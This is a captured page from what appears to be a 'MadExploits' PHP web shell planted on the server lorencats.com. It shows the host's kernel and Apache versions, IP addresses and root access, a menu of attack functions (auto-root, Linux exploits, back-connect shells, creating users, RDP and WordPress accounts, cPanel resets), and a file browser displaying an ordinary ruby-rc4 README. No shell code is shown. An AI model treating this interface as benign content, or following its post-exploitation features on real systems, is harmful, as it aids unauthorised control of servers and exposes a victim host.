Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.15
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
ruby-rc4 /
[ HOME SHELL ]
Name
Size
Permission
Action
README.md
1003
B
-rw-r--r--
changelog.Debian.gz
447
B
-rw-r--r--
copyright
1.61
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README.md
# RC4 RC4 is a pure Ruby implementation of the Rc4 algorithm. ## Usage First require the gem: require 'rc4' To encrypt: key = "nuff rspec" enc = RC4.new(key) encrypted = enc.encrypt("super-cool-test") To decrypt: dec = RC4.new(key) decrypted = dec.decrypt(encrypted) Since encrypt method is used for encryption and decryption, decrypt is just an alias to encrypt in order to make the usage more intuitive. # Note The original algorithm implementation in Ruby by Max Prokopiev <max-prokopiev@yandex.ru>. Aleksandar Simic then modified it to include a test suite and gem packaged it using gem-this. <asimic@gmail.com> I switched the project to use rspec2 and am the now the project's primary maintainer. Caige Nichols <caigesn@gmail.com> # License Ruby-RC4 is released under the MIT license. # Contributors (Please let me know if I missed anyone) - [caiges](http://github.com/caiges) - [juggler](http://github.com/juggler) (original author) - Alexandar Simic
Close